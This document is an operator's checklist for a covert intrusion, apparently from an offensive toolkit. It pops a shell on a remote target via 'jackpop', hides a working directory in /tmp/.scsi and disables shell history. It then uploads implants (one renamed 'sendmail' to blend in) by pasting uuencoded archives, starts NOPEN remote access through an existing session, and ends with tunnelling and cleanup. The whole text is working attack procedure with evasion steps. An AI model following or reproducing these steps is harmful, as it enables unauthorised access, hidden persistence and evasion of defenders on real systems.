################ #### Jackpop to get a shell on target (Hey, #### why didn't we try this before?) ################ # Don't forget: -jackpop does not like its old windows # existing still on later tries. # port-to-jack: 25 works. 13 works. Maybe others? -jackpop REMOTEIP port-to-jack PITCH_IP random11111-44444-3 # Option 3 run command on target. # Choose offset if needed, and IN bless or not. 3 # Command to run: cd /tmp ; ls -arlt ; mkdir .scsi ; cd .scsi ; ls -alrt ; pwd ; exec sh # That popped up window is sort-of a shell,make sure you're in /tmp/.scsi # and it's empty. ################ #### WARNING: #### This popped up shell window must be exited with "exit" and NOT ^D. #### If you exit with ^D the sh and maybe other processes will be #### stranded and not die cleanly. ################ # This is important: without it the uudecode fails, but # otherwise it doesn't do much visibly. stty -echo # We use this shell to upload poptop and noserver. # But first...(paste the whole bunch) unset HISTFILE unset HISTSIZE unset HISTFILESIZE type perl uudecode uncompress tar # if the type command fails try: which perl uudecode uncompress tar ###### ## LOCAL PREP (can do from any local dir--paste complete blocks) ## Some of these you willl not use, FYI. ###### ## Make sure this is right noserver cp /current/up/noserver /current/up/sendmail ## pick right poptop cp /current/up/poptop.sparc /current/up/pt sum -s /current/up/pt /current/up/sendmail chown 0:0 /current/up/pt* /current/up/sendmail* tar -C /current/up -cvf /current/up/u.tar sendmail pt compress -c /current/up/u.tar > /current/up/u.tar.Z uuencode /current/up/u.tar.Z u.tar.Z > /current/up/u.tar.Z.uu gedit /current/up/u.tar.Z.uu& ls -arlt /current/up | egrep "uu$|u.tar|sendmail| pt|poptop|noserver" ## Probably don't need the rest unless target has no tar or uncompress: uuencode /current/up/pt pt > /current/up/pt.uu uuencode /current/up/sendmail sendmail > /current/up/sendmail.uu uuencode /current/up/u.tar u.tar > /current/up/u.tar.uu gedit /current/up/*.uu& ls -arlt /current/up | egrep "uu$|u.tar|sendmail| pt|poptop|noserver" #################################### EITHER THIS (if uudecode on target) ###### ## REMOTE ###### uudecode ###### ## LOCALLY select the gedit tab for what you want to ## paste up there (based on whether uncompress is there). ## The top one, u.tar.Z, is likely what you want. ## Then middle-click paste it into target window. ###### #################################### OR THIS (if perl is there) ###### ## no uudecode but we do have perl on target? ###### ## LOCALLY run one of these (brings up new tab in gedit--use it) ## if uncompress on target uudecode.pastable /current/up/u.tar.Z u.tar.Z ## if not uudecode.pastable /current/up/u.tar u.tar ###### ## LOCALLY select the gedit tab for what you want to ## paste up there (based on whether uncompress is there) ## Then middle-click paste it into target window. ###### #################################### THEN FOLLOW WITH THIS ###### ## REMOTE--choose whatever makes sense--all should be safe ###### ls -arlt uncompress *Z for i in *tar ; do tar xvf $i ; done ls -arlt ## If it unpacked OK. rm u.tar* #################################### ARE WE THERE YET? ###### ## LOCALLY Start this in a scripted window ## local poptop always connects to 8080 ###### noclient -l 8080 ###### ## REMOTE -- Time to run NOPEN (and it inherits this session via pt) ###### # Start server listening PATH=. D=-lrandom22222-55555-1 sendmail # Use this session to connect to it via pt # (you should see "tty should be setup...") PATH=. pt random22222-55555-1 # Typing this next "---\n" string activates poptop here and # there to connect a local noclient to the remote noserver # via this already established TCP session. --- ###### ## FINI - clean up a bit ###### ## Once NOPEN is up and running, both the previous hop's ## noclient window where -jackpop was run and the ## shell window it popped up will be tied up. ## Post -burnBURN on the new nopen, the popped up ## window should exit on its own. DONE in the -jackpop ## window. ###### -cd /tmp rm -rf /tmp/.scsi # Op away.... ###### ## Need multiple windows? ###### -tunnel l random22222-55555-1 random22222-55555-1 ###### ## LOCALLY then ###### noclient -c "-cd /tmp" ## Bailing -burn BURN DONE PATH=. D=-l18787 sendmail cd /tmp PATH=/tmp/.scsi pt 18787